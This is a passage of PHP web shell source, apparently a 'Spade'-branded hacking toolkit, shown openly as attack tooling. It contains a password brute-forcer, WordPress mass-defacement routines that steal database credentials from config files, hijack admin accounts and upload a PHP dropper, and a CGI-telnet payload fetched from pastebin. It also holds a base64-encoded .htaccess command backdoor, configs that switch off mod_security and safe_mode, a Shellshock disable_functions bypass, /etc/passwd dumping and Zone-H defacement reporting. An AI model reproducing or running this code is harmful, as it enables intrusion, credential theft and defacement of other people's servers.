- </select> Website/IP Address:: <input type='text' name='target' value='localhost'> Port:: <input type='number' name='port' value='2083'>
- <table width='30%''><td align='center'>Users List</td><td align='center'>Passwords</td></table>
- <textarea placeholder=\"Users\" rows=\"20\" cols=\"25\" name=\"usernames\">".exe("cut -d: -f1 /etc/passwd")."</textarea>
-   <textarea placeholder=\"Passwords\" rows=\"20\" cols=\"25\" name=\"passwords\"></textarea><br><br>
- Save Result Into File:: <input type=\"text\" name=\"fcrack\" value=\"cracked.txt\"><br>
- <input type=\"submit\" name=\"cracking\" value=\"Crack That Sh!t\" />
- </form>
- ";
- if(isset($_POST['target'])){
- $target = str_replace(array('https://','http://','ftp://'),'',$_POST['target']);
- $port = $_POST['port'];
- $usernames= $_POST['usernames'];
- $passwords = $_POST['passwords'];
- $fcrack = $_POST['fcrack'];
- $cracking = $_POST['cracking'];
- $protocol = $_POST['protocol'];
- $loginpanel = $_POST['loginpanel'];
- $p = $loginpanel == 'phpmyadmin' ? $p = true : false;
- if($cracking=='Crack That Sh!t'){
- $exuser = explode("\n",$usernames);
- $expw = explode("\n",$passwords);
- foreach($exuser as $user){
- foreach($expw as $pw){
- $array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);
- Alfa_Call_Function_Cracker($loginpanel,$array);
- }
- }
- echo '<br><font color="red">Attack Finished...</font>';
- }
- }
- echo "</center>";}
- }elseif($_GET['do'] == 'auto_wp') {
- if($_POST['hajar']) {
- $title = htmlspecialchars($_POST['new_title']);
- $pn_title = str_replace(" ", "-", $title);
- if($_POST['cek_edit'] == "Y") {
- $script = $_POST['edit_content'];
- } else {
- $script = $title;
- }
- $conf = $_POST['config_dir'];
- $scan_conf = scandir($conf);
- foreach($scan_conf as $file_conf) {
- if(!is_file("$conf/$file_conf")) continue;
- $config = file_get_contents("$conf/$file_conf");
- if(preg_match("/WordPress/", $config)) {
- $dbhost = ambilkata($config,"DB_HOST', '","'");
- $dbuser = ambilkata($config,"DB_USER', '","'");
- $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
- $dbname = ambilkata($config,"DB_NAME', '","'");
- $dbprefix = ambilkata($config,"table_prefix = '","'");
- $prefix = $dbprefix."posts";
- $option = $dbprefix."options";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
- $result = mysql_fetch_array($q);
- $id = $result[ID];
- $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
- $result2 = mysql_fetch_array($q2);
- $target = $result2[option_value];
- $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
- $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
- echo "<div style='margin: 5px auto;'>";
- if($target == '') {
- echo "URL: <font color=red>error, could not take his domain name</font> -> ";
- } else {
- echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
- }
- if(!$update OR !$conn OR !$db) {
- echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
- } else {
- echo "<font color=lime>Success.</font><br>";
- }
- echo "</div>";
- mysql_close($conn);
- }
- }
- } else {
- echo "<center>
- <h1 class='titulo'>AUTO EDIT WP TITLE/CONTENT</h1>
- <form method='post'>
- DIR Config: <br>
- <input type='text' size='50' name='config_dir' value='$dir'><br><br>
- Set Title: <br>
- <input type='text' name='new_title' value='Hacked By Spade' placeholder='New Title'><br><br>
- Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
- <span>If You Select <u>Y</u> Paste Your Deface Page below!, If <u>N</u> just leave it Blank.</span><br>
- <textarea name='edit_content' placeholder='Paste Your Deface Page here!' style='width: 450px; height: 150px;'></textarea><br>
- <input type='submit' name='hajar' value='Submit' style='width: 450px;'><br>
- </form>
- <span>NB: These tools work if run in the <u>config</u> folder ( ex: /home/user/public_html/name_folder_config )</span><br>
- ";
- }
- } elseif($_GET['do'] == 'zoneh') {
- if($_POST['submit']) {
- $domain = explode("\r\n", $_POST['url']);
- $nick = $_POST['nick'];
- echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier={$nick}/published=0' target='_blank'>http://www.zone-h.org/archive/notifier={$nick}/published=0</a><br>";
- echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier={$nick}' target='_blank'>http://www.zone-h.org/archive/notifier={$nick}</a><br><br>";
- function zoneh($url,$nick) {
- $ch = curl_init("http://www.zone-h.com/notify/single");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer={$nick}&domain1={$url}&hackmode=1&reason=1&submit=Send");
- return curl_exec($ch);
- curl_close($ch);
- }
- foreach($domain as $url) {
- $zoneh = zoneh($url,$nick);
- if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
- echo "$url :~> <font color=lime>OK</font><br>";
- } else {
- echo "$url :~> <font color=red>ERROR</font><br>";
- }
- }
- } else {
- echo "<center><h1 class='titulo'>ZONE-H</h1></center><br>";
- echo "<center><form method='post'>
- <u>Defacer</u>: <br>
- <input type='text' name='nick' size='50' value='Spade'><br>
- <u>Domains</u>: <br>
- <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
- <input type='submit' name='submit' value='Submit' style='width: 450px;'>
- </form>";
- }
- echo "</center>";
- } elseif($_GET['do'] == 'cgi') {
- @mkdir('spade_cgi', 0755);
- @chdir("spade_cgi");
- $file_cgi = "cgi.cin";
- $isi_htcgi = "Options FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
- $htcgi = fopen(".htaccess", "w");
- $cgi_script = file_put_contents("http://pastebin.com/raw/wRc0svUF");
- $cgi = fopen($file_cgi, "w");
- fwrite($cgi, base64_decode($cgi_script));
- fwrite($htcgi, $isi_htcgi);
- chmod($file_cgi, 0755);
- echo "<center><h1 class='titulo'>CGI-TELNET 2k12</h1><br>";
- echo "<iframe src='spade_cgi/cgi.cin' width='100%' height='100%' frameborder='0' scrolling='no'></iframe></center>";
- } elseif($_GET['do'] == 'fake_root') {
- ob_start();
- function reverse($url) {
- $ch = curl_init("http://domains.yougetsignal.com/domains.php");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
- curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_POST, 1);
- $resp = curl_exec($ch);
- $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
- $array = explode(",,", $resp);
- unset($array[0]);
- foreach($array as $lnk) {
- $lnk = "http://$lnk";
- $lnk = str_replace(",", "", $lnk);
- echo $lnk."\n";
- ob_flush();
- flush();
- }
- curl_close($ch);
- }
- function cek($url) {
- $ch = curl_init($url);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
- $resp = curl_exec($ch);
- return $resp;
- }
- $cwd = getcwd();
- $ambil_user = explode("/", $cwd);
- $user = $ambil_user[2];
- if($_POST['reverse']) {
- $site = explode("\r\n", $_POST['url']);
- $file = $_POST['file'];
- foreach($site as $url) {
- $cek = cek("$url/.~$user/$file");
- if(preg_match("/hacked/i", $cek)) {
- echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/.~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
- }
- }
- } else {
- echo "<center><h1 class='titulo'>FAKE ROOTER</h1></center><br>";
- echo "<center><form method='post'>
- Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
- User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
- Domain: <br>
- <textarea style='width: 450px; height: 250px;' name='url'>";
- reverse($_SERVER['HTTP_HOST']);
- echo "</textarea><br>
- <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
- </form><br>
- NB: Upload Your deface page in /home/user not in the /home/user/public_html (Common Sense Enters here).</center>";
- }
- } elseif($_GET['do'] == 'adminer') {
- $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
- function adminer($url, $isi) {
- $fp = fopen($isi, "w");
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($ch, CURLOPT_FILE, $fp);
- return curl_exec($ch);
- curl_close($ch);
- fclose($fp);
- ob_flush();
- flush();
- }
- if(file_exists('adminer.php')) {
- echo "<center><h1 class='titulo'>ADMINER</h1></center><br>";
- echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> ADMINER LOGIN <-</a></font></center>";
- } else {
- if(adminer("https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php","adminer.php")) {
- echo "<center><h1 class='titulo'>ADMINER</h1></center><br>";
- echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> ADMINER LOGIN <-</a></font></center>";
- } else {
- echo "<center><font color=red>Failed to get Adminer!</font></center>";
- }
- }
- }elseif($_GET['do'] == 'bypasser') {
- echo "<center><h1 class='titulo'>BYPASS</h1><br><br><h2 class='titulo'>BYPASS ETC/PASSWD</h2></center><br>";
- echo '<center>Bypass etc/passw With:<br>
- <table style="width:50%">
- <tr>
- <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
- <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
- <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>
- <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>
- <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
- </tr></table>Bypass User With : <table style="width:50%">
- <tr>
- <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
- <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
- <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>
- <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>
- <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
- </tr>
- </table><br>';
- echo '<center><h2 class="titulo"> SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS </h2><br><p1>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir</p1><table style="width: 30%;"><tr><td><form method="post"><input type="submit" value="php.ini" style="width: 100%;" name="phpini"></form></td><td><form method="post"><input type="submit" value=".htaccess" style="width: 100%;" name="htaccessmod"></form></td><td><form method="post"><input type="submit" value=".htaccess(perl)" style="width: 100%;" name="htaccessperl"></form></td><td><form method="post" ><input type="submit" value=".htaccess(shell backdoor)" style="width: 100%;" name="htaccessbd"></td></tr><tr><td><input type=submit name="apache" value=".htaccess(apache)"></td><td><input type=submit name="litespeed" value=".htaccess(litespeed)"></td><td><input type=submit name="iniphp" value="ini.php"></td></tr></form></table><br>';
- if(isset($_POST['iniphp'])){
- $ini = "<?\necho ini_get('safe_mode');\necho ini_get('open_basedir');\ninclude(\$_GET['file']);\nini_restore('safe_mode');\nini_restore('open_basedir');\necho ini_get('safe_mode');
- \necho ini_get('open_basedir');\ninclude(\$_GET['ss']);\n?>"; $php = fopen($GLOBALS['cwd']."ini.php", "w");
- $iniphp = fwrite($php, $ini); if(!$iniphp){echo "<br><font color=red>Unable to Generate INI.PHP</font>"; }else{ echo "<br><font color=lime>INI.PHP Generated Successfully!</font>"; } fclose($iniphp);
- }
- if(isset($_POST['litespeed'])){
- $lite = "<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>";
- $speed = fopen($GLOBALS['cwd'].".htaccess", "w");
- $litespeed = fwrite($speed, $lite); if(!$litespeed){echo "<br><font color=red>Unable to Generate .HTACCESS(lightspeed)</font>"; }else{ echo "<br><font color=lime>.HTACCESS(lightspeed) Generated Successfully!</font>"; } fclose($speed);
- }
- if(isset($_POST['apache'])){
- $apache = "<IfModule mod_security.c>\nSec------Engine Off\nSec------ScanPOST Off\n</IfModule>";
- $apacheche = fopen($GLOBALS['cwd'].".htaccess", "w");
- $lelss = fwrite($apacheche, $apache); if(!$lelss){ echo "<br><font color=red>Unable to Generate .HTACCESS(apache)</font>"; }else{ echo "<br><font color=lime>.HTACCESS(apache) Generated Successfully!</font>"; } fclose($apacheche);
- }
- if(isset($_POST['phpini'])){
- $phpini = "safe_mode=OFF\ndisable_functions=NONE\nsafe_mode_gid=OFF\nopen_basedir=OFF\nallow_url_fopen=ON";
- $spadephp = fopen($GLOBALS['cwd']."php.ini", "w");
- $sulat1 = fwrite($spadephp, $phpini); if(!$sulat1){ echo "<br><font color=red>Unable to Generate PHP.INI</font>";}else{ echo "<br><font color=lime>PHP.INI Generated Successfully!</font>";}
- fclose($spadephp);
- }
- if(isset($_POST['htaccessmod'])){
- $htmod = "<IfModule mod_security.c>\nSecFilterEgine Off\nSecFilterScanPOST Off\nSecFilterCheckURLEncoding Off\nSecFilterCheckUnicodeEncoding Off\n</IfModule>";
- $spademod = fopen($GLOBALS['cwd'].".htaccess", "w");
- $sulat2 = fwrite($spademod, $htmod); if(!$sulat2){ echo "<br><font color=red>Unable to Generate .HTACCESS</font>";}else{ echo "<br><font color=lime>.HTACCESS Generated Successfully!</font>";}
- fclose($spademod);
- }
- if(isset($_POST['htaccessperl'])){
- $htperl = "Options FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .sh\nAddHandler cgi-script .pl\nAddHandler cgi-script .pl";
- $spadeperl = fopen($GLOBALS['cwd'].".htaccess", "w");
- $sulat3 = fwrite($spadeperl, $htperl); if(!$sulat3){ echo "<br><font color=red>Unable to Generate .HTACCESS(Perl)</font>";}else{ echo "<br><font color=lime>.HTACCESS(Perl) Generated Successfully!</font>";}
- fclose($spadeperl);
- }
- if(isset($_POST['htaccessbd'])){
- $htbd = base64_decode("PEZpbGVzIH4gIl5cLmh0Ij5cbk9yZGVyIGFsbG93LGRlbnlcbkFsbG93IGZyb20gYWxsXG48L2ZpbGVzPlxuQWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLXBocCAuaHRhY2Nlc3NcbiMgPD9waHAgcGFzc3RocnUoJF9HRVRbJ2NtZCddKTs/Pg==");
- $spadebd = fopen($GLOBALS['cwd'].".htaccess", "w");
- $sulat4 = fwrite($spadebd, $htbd); if(!$sulat4){ echo "<br><font color=red>Unable to Generate .HTACCESS(Shell)</font>";}else{ echo "<br><font color=lime>.HTACCESS(Shell) Generated Successfully!</font>";}
- fclose($spadebd);
- }
- echo "<center><table style='width: 50%;'><tr><h2 class='titulo'>BYPASS CHMOD DIR & FILE PRIV8</h2><br><form method='post'><td><input type='text' name='link3rx' style='width: 100%;' placeholder='ex: ".$dir."'></td></tr><tr><td><input type='submit' value='BYPASS CHMOD DIR'></td></form></tr></table><br>";
- if(isset($_POST['link3rx'])){
- $spade = $_POST['link3rx'];
- $ch = @chmod($spade,'0311');
- if($ch){ echo "<br><font color='lime'>Directory [".$spade."] Successfully Bypassed!</font>"; }else{ echo "<br><font color='red'>Directory [".$spade."] Failed to Bypass!</font>";}
- echo "</center>";
- }
- echo "<center><table style='width: 50%;'><tr><h2 class='titulo'>PHP 5.X SHELLSHOCK EXPLOIT (BYPASS DISABLE_FUNCTION)</h2><br><form method='post'><td><input type=text name='shellshock' style='width: 100%;'></td></tr><tr><td><input type=submit value='SHELLSHOCK'><br></td></tr></table><br>";
- if(isset($_POST['shellshock'])){
- function shellsh0ck($kewl){
- if(strstr(readlink("/bin/sh"), "bash") != FALSE){
- $tmp = tempnam(".", "data");
- putenv("PHP_LOL=(){ x; }; $kewl >$tmp 2>&1");
- mail("spade@127.0.0.1","","","","-bv");
- }else{
- $file=tempnam("/tmp", "xpl");
- putenv("PHP_XPL=() { :;}; {$kewl}>{$file}");
- mail("spade@localhost", "", "", "", "-bv");
- echo file_get_contents($file);
- unlink($file);
- }
- }
- echo"<textarea class='inputzbut' cols='65' rows='15'>".shellsh0ck($_POST['shellshock'])."</textarea></center><br>";
- }
- if ($_POST['awkuser']) {
- echo"<textarea class='inputzbut' cols='65' rows='15'>";
- echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
- echo "</textarea><br>";
- }
- if ($_POST['systuser']) {
- echo"<textarea class='inputzbut' cols='65' rows='15'>";
- echo system("ls /var/mail");
- echo "</textarea><br>";
- }
- if ($_POST['passthuser']) {
- echo"<textarea class='inputzbut' cols='65' rows='15'>";
- echo passthru("ls /var/mail");
- echo "</textarea><br>";
- }
- if ($_POST['exuser']) {
- echo"<textarea class='inputzbut' cols='65' rows='15'>";
- echo exec("ls /var/mail");
- echo "</textarea><br>";
- }
- if ($_POST['shexuser']) {
- echo"<textarea class='inputzbut' cols='65' rows='15'>";
- echo shell_exec("ls /var/mail");
- echo "</textarea><br>";
- }
- if($_POST['syst'])
- {
- echo"<textarea class='inputz' cols='65' rows='15'>";
- echo system("cat /etc/passwd");
- echo"</textarea><br><br><b></b><br>";
- }
- if($_POST['passth'])
- {
- echo"<textarea class='inputz' cols='65' rows='15'>";
- echo passthru("cat /etc/passwd");
- echo"</textarea><br><br><b></b><br>";
- }
- if($_POST['ex'])
- {
- echo"<textarea class='inputz' cols='65' rows='15'>";
- echo exec("cat /etc/passwd");
- echo"</textarea><br><br><b></b><br>";
- }
- if($_POST['shex'])
- {
- echo"<textarea class='inputz' cols='65' rows='15'>";
- echo shell_exec("cat /etc/passwd");
- echo"</textarea><br><br><b></b><br>";
- }
- echo '<center>';
- if($_POST['melex'])
- {
- echo"<textarea class='inputz' cols='65' rows='15'>";
- for($uid=0;$uid<60000;$uid++){
- $ara = posix_getpwuid($uid);
- if (!empty($ara)) {
- while (list ($key, $val) = each($ara)){
- print "$val:";
- }
- print "\n";
- }
- }
- echo"</textarea><br><br>";
- }
- } elseif($_GET['do'] == 'auto_dwp') {
- if($_POST['auto_deface_wp']) {
- function anucurl($sites) {
- $ch = curl_init($sites);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIESESSION, true);
- $data = curl_exec($ch);
- curl_close($ch);
- return $data;
- }
- function lohgin($cek, $web, $userr, $pass, $wp_submit) {
- $post = array(
- "log" => "$userr",
- "pwd" => "$pass",
- "rememberme" => "forever",
- "wp-submit" => "$wp_submit",
- "redirect_to" => "$web",
- "testcookie" => "1",
- );
- $ch = curl_init($cek);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
- curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIESESSION, true);
- $data = curl_exec($ch);
- curl_close($ch);
- return $data;
- }
- $scan = $_POST['link_config'];
- $link_config = scandir($scan);
- $script = htmlspecialchars($_POST['script']);
- $user = "spade";
- $pass = "spade";
- $passx = md5($pass);
- foreach($link_config as $dir_config) {
- if(!is_file("$scan/$dir_config")) continue;
- $config = file_get_contents("$scan/$dir_config");
- if(preg_match("/WordPress/", $config)) {
- $dbhost = ambilkata($config,"DB_HOST', '","'");
- $dbuser = ambilkata($config,"DB_USER', '","'");
- $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
- $dbname = ambilkata($config,"DB_NAME', '","'");
- $dbprefix = ambilkata($config,"table_prefix = '","'");
- $prefix = $dbprefix."users";
- $option = $dbprefix."options";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
- $result = mysql_fetch_array($q);
- $id = $result[ID];
- $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
- $result2 = mysql_fetch_array($q2);
- $target = $result2[option_value];
- if($target == '') {
- echo "[-] <font color=red>error, could not take his domain name</font><br>";
- } else {
- echo "[+] $target <br>";
- }
- $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
- if(!$conn OR !$db OR !$update) {
- echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
- mysql_close($conn);
- } else {
- $site = "$target/wp-login.php";
- $site2 = "$target/wp-admin/theme-install.php?upload";
- $b1 = anucurl($site2);
- $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
- $b = lohgin($site, $site2, $user, $pass, $wp_sub);
- $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
- $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
- $www = "m.php";
- $fp5 = fopen($www,"w");
- fputs($fp5,$upload3);
- $post2 = array(
- "_wpnonce" => "$anu2",
- "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
- "themezip" => "@$www",
- "install-theme-submit" => "Install Now",
- );
- $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
- curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIESESSION, true);
- $data3 = curl_exec($ch);
- curl_close($ch);
- $y = date("Y");
- $m = date("m");
- $namafile = "id.php";
- $fpi = fopen($namafile,"w");
- fputs($fpi,$script);
- $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
- curl_setopt($ch6, CURLOPT_POST, true);
- curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
- curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
- curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
- curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
- $postResult = curl_exec($ch6);
- curl_close($ch6);
- $as = "$target/k.php";
- $bs = anucurl($as);
- if(preg_match("#$script#is", $bs)) {
- echo "[+] <font color='lime'>Manage...</font><br>";
- echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
- } else {
- echo "[-] <font color='red'>Error!...</font><br>";
- echo "[!!] Just Try Manual: <br>";
- echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
- echo "[+] username: <font color=lime>$user</font><br>";
- echo "[+] password: <font color=lime>$pass</font><br><br>";
- }
- mysql_close($conn);
- }
- }
- }
- } else {
- echo "<center><h1 class='titulo'>WordPress Auto Deface</h1>
- <form method='post'>
- <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
- <input type='text' name='script' height='10' size='50' placeholder='Hacked By Spade' required><br>
- <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Deface!!'>
- </form>
- <br><span>NB: These tools work if run in a folder <u>config</u> ( ex: /home/user/public_html/name_folder_config )</span>
- </center>";
- }
- } elseif($_GET['do'] == 'auto_dwp2') {
- if($_POST['auto_deface_wp']) {
- function anucurl($sites) {
- $ch = curl_init($sites);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIESESSION,true);
- $data = curl_exec($ch);
- curl_close($ch);
- return $data;
- }
- function lohgin($cek, $web, $userr, $pass, $wp_submit) {
- $post = array(
- "log" => "$userr",
- "pwd" => "$pass",
- "rememberme" => "forever",
- "wp-submit" => "$wp_submit",
- "redirect_to" => "$web",
- "testcookie" => "1",
- );
- $ch = curl_init($cek);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
- curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIESESSION, true);
- $data = curl_exec($ch);
- curl_close($ch);
- return $data;
- }
- $link = explode("\r\n", $_POST['link']);
- $script = htmlspecialchars($_POST['script']);
- $user = "spade";
- $pass = "spade";
- $passx = md5($pass);
- foreach($link as $dir_config) {
- $config = anucurl($dir_config);
- $dbhost = ambilkata($config,"DB_HOST', '","'");
- $dbuser = ambilkata($config,"DB_USER', '","'");
- $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
- $dbname = ambilkata($config,"DB_NAME', '","'");
- $dbprefix = ambilkata($config,"table_prefix = '","'");
- $prefix = $dbprefix."users";
- $option = $dbprefix."options";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
- $result = mysql_fetch_array($q);
- $id = $result[ID];
- $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
- $result2 = mysql_fetch_array($q2);
- $target = $result2[option_value];
- if($target == '') {
- echo "[-] <font color=red>error, could not take his domain name</font><br>";
- } else {
- echo "[+] $target <br>";
- }
- $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
- if(!$conn OR !$db OR !$update) {
- echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
- mysql_close($conn);
- } else {
- $site = "$target/wp-login.php";
- $site2 = "$target/wp-admin/theme-install.php?upload";
- $b1 = anucurl($site2);
- $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
- $b = lohgin($site, $site2, $user, $pass, $wp_sub);
- $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
